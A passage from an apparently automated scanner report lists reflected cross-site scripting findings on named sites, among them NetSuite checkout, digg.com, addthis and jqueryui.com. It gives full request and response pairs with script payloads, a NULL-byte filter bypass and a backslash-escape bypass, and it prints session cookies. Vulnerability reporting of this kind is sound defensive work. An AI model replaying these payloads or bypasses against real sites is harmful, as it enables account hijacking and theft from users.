<input type='hidden' name='referer' value='https://checkout.netsuite.com/s.nl?continueclicked=T&kReferralCode=%27&vid=rnoX2kNXAZKv7gpK&n=3&origsc=4&ck=rnoX2q9XAatYKaJC&sShipMeth=12440&cart=148243&8bc49'style='x:expression(alert(1))'02b68d32520=1&cktime=87993'>
...[SNIP]...

2.18. https://checkout.netsuite.com/s.nl [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be972'><script>alert(1)</script>b07e51e7e4a was submitted in the vid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl/c.1034828/n.3/sc.4/category.shipping/.f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 276

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26category%3Dshipping%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:49:13 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 171064755:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=vXc6MyKZQN6rT2TpmWLlpPYKymvMs21nWLJn4YfbHC2VkbKFCTpgHdWhTsfwVcJvksz6JspzMvTP1cyy1KcnBXLFyTZsMrbl41zBcbgBdFWnZ88bXQMBTxkblSHpT2yd!-548196153; path=/
Set-Cookie: NLVisitorId=rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a; domain=.netsuite.com; expires=Friday, 11-Nov-2011 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=949
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 56929


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='vid' value='rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a'>
...[SNIP]...

2.19. http://dictionary.reference.com/browse/turn [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.reference.com
Path:   /browse/turn

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4efa7'-alert(1)-'c39736470a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/turn4efa7'-alert(1)-'c39736470a4 HTTP/1.1
Host: dictionary.reference.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:41 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: classicef=3ae7a17daae7a17da; Domain=reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/
Set-Cookie: NewUser=|ds1; Domain=reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/
Set-Cookie: accepting=1; Domain=.reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/
Connection: close
Content-Length: 44233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head
...[SNIP]...
<script type="text/javascript">
function adcall(){
var adTarget;
adTarget ='/site=dictionary.com/area=search/aamsz=720x300/keyword=turn4efa7'-alert(1)-'c39736470a4'+ '' +'/pageid=' + aamPageId +'/random=' + aamRndNum;
mywindow=window.open ("","mywindow","status=1");
mywindow.document.write('<scr' + 'ipt language="javascript" type="text/javascript"' +' src="' + a
...[SNIP]...

2.20. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005cb94"><script>alert(1)</script>0818a587233 was submitted in the REST URL parameter 1. This input was echoed as 5cb94"><script>alert(1)</script>0818a587233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%005cb94"><script>alert(1)</script>0818a587233 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:50:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Mon, 20-Dec-2010 16:50:41 GMT; path=/; domain=digg.com
Set-Cookie: d=d435a4bd0a1485d46aa44d42abf1d4ec3ffeea842f2c2d916cfae535ea33c726; expires=Fri, 20-Nov-2020 02:58:21 GMT; path=/; domain=.digg.com
X-Digg-Time: D=280200 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15330

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%005cb94"><script>alert(1)</script>0818a587233.rss">
...[SNIP]...

2.21. http://ds.addthis.com/red/psi/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 729d1<script>alert(1)</script>ee38120a664 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664 HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dt=X; uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 246
Content-Type: text/javascript
Set-Cookie: di=%7B%7D..1290271839.10R|1290201756.60|1289335234.66; Domain=.addthis.com; Expires=Mon, 19-Nov-2012 04:52:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 20 Dec 2010 16:50:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 16:50:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 16:50:39 GMT
Connection: close

_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664({"urls":["http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=115&partnerUID=4cd70ff39ffa55be&sscs_active=1"],"segments" : ["10R"],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

2.22. http://ds.addthis.com/red/psi/sites/www.directpointe.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.directpointe.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload acd1e<script>alert(1)</script>a8518672223 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.directpointe.com/p.json?callback=_ate.ad.hpracd1e<script>alert(1)</script>a8518672223&uid=4cd70ff39ffa55be&url=http%3A%2F%2Fwww.directpointe.com%2F&pusuw0 HTTP/1.1
Accept: */*
Referer: http://s7.addthis.com/static/r07/sh28.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ds.addthis.com
Proxy-Connection: Keep-Alive
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 16:48:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 16:48:59 GMT
Connection: close

_ate.ad.hpracd1e<script>alert(1)</script>a8518672223({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

2.23. http://images.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://images.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c305d\'%3b635163da252 was submitted in the q parameter. This input was echoed as c305d\\';635163da252 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictures?qsrc=0&o=0&l=dir&q=c305d\'%3b635163da252 HTTP/1.1
Host: images.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:51:36 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:51:37 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: tbe=1; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: accepting=1; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjUxOjM3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Connection: close
Content-Length: 49999


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
ds_recieved= '';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'c305d\\';635163da252';
google_kw = 'c305d\\';635163da252';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute('fSecondCall',
...[SNIP]...

2.24. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b626"><script>alert(1)</script>9ec3e8ecc13 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F85b626"><script>alert(1)</script>9ec3e8ecc13&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F85b626"><script>alert(1)</script>9ec3e8ecc13&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHi
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6b8"><script>alert(1)</script>2191a8942ba was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF3b6b8"><script>alert(1)</script>2191a8942ba&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF3b6b8"><script>alert(1)</script>2191a8942ba&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d054d"><script>alert(1)</script>a6d04b0004 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFFd054d"><script>alert(1)</script>a6d04b0004&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFFd054d"><script>alert(1)</script>a6d04b0004&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4088"><script>alert(1)</script>2de39e79b84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFFd4088"><script>alert(1)</script>2de39e79b84&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFFd4088"><script>alert(1)</script>2de39e79b84&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f8a"><script>alert(1)</script>5c9db817cbc was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

